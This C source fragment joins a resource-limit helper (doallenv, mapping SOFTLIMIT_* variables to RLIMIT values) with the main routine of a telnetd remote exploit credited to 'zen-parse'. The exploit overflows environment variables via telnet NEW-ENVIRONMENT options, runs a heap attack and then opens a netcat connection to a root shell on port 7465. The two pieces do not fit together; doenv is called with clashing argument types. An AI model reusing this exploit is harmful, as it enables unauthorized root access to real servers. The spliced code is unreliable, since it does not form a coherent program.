static void doallenv(void) { #ifdef RLIMIT_AS doenv(RLIMIT_AS,"SOFTLIMIT_ALLBYTES"); doenv(RLIMIT_AS,"SOFTLIMIT_MEMBYTES"); #endif #ifdef RLIMIT_VMEM doenv(RLIMIT_VMEM,"SOFTLIMIT_ALLBYTES"); doenv(RLIMIT_VMEM,"SOFTLIMIT_MEMBYTES"); #endif #ifdef RLIMIT_CORE doenv(RLIMIT_CORE,"SOFTLIMIT_COREBYTES"); #endif #ifdef RLIMIT_DATA doenv(RLIMIT_DATA,"SOFTLIMIT_DATABYTES"); doenv(RLIMIT_DATA,"SOFTLIMIT_MEMBYTES"); #endif #ifdef RLIMIT_FSIZE doenv(RLIMIT_FSIZE,"SOFTLIMIT_FILEBYTES"); #endif #ifdef RLIMIT_MEMLOCK doenv(RLIMIT_MEMLOCK,"SOFTLIMIT_LOCKEDBYTES"); doenv(RLIMIT_MEMLOCK,"SOFTLIMIT_MEMBYTES"); #endif #ifdef RLIMIT_STACK doenv(RLIMIT_STACK,"SOFTLIMIT_STACKBYTES"); doenv(RLIMIT_STACK,"SOFTLIMIT_MEMBYTES"); #endif #ifdef RLIMIT_NOFILE doenv(RLIMIT_NOFILE,"SOFTLIMIT_OPENFILES"); #endif #ifdef RLIMIT_OFILE doenv(RLIMIT_OFILE,"SOFTLIMIT_OPENFILES"); #endif #ifdef RLIMIT_NPROC doenv(RLIMIT_NPROC,"SOFTLIMIT_PROCS"); #endif #ifdef RLIMIT_RSS doenv(RLIMIT_RSS,"SOFTLIMIT_RSSBYTES"); #endif #ifdef RLIMIT_CPU doenv(RLIMIT_CPU,"SOFTLIMIT_CPUSECS"); #endif }
main (int argc, char *argv[]) { int br, l, dosleep = 0; int percent = 0; char spin; unsigned char w; bzero (oldenv, sizeof (oldenv)); argv++; dalen = strlen ("clarity.local"); while (argv[0]) { if (!strcmp (argv[0], "--pause")) dosleep = 1; if (!strcmp (argv[0], "--size") && argv[1]) { mipl = atoi (argv[1]); argv++; } if (!strcmp (argv[0], "--name") && argv[1]) { dalen = strlen (argv[1]); argv++; } argv++; } fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen); if(dalen%3==0) { offsets=offset3; } else { ninbufoffset = mipl % 8192; offsets[11] += 32 * (mipl - ninbufoffset) / 8192; if (offsets[11] > 255) { fprintf (stderr, " ! MiPl too big.", mipl, dalen); exit (1); } } sock_setup (); if (dosleep) { system ("sleep 1;ps aux|grep in.telnetd|grep -v grep"); sleep (8); } dalen += strlen ("\r\n[ : yes]\r\n"); fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n"); fflush (stderr); doo (5); will (39); fflush (dasock); read_sock (); fprintf (stderr, "o Setting up environment vars...\n"); fflush (stderr); will (1); push_clean (); doenv ("USER", "zen-parse"); doenv ("TERM", "zen-parse"); will (39); fflush (dasock); fprintf (stderr, "o Doing overflows...\n"); fflush (stderr); for (br = 0; (offsets[br] || offsets[br + 1]); br += 2) { fill (mipl + ENV + offsets[br], offsets[br + 1]); fflush (dasock); usleep (100000); read_sock (); } fprintf (stderr, "o Overflows done...\n"); fflush (stderr); push_clean (); fprintf (stderr, "o Sending IACs to start login process...\n"); fflush (stderr); wont (24); wont (32); wont (35); fprintf (dasock, "%s", tosend); will (1); push_heap_attack (); sleep (1); fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n"); execlp ("nc", "nc", "-v", "localhost", "7465", 0); fprintf (stderr, "o If the exploit worked, there should be an open port on 7465.\n"); fprintf (stderr, " It is a root shell. You should probably close it.\n"); fflush (stderr); sleep (60); exit (0); }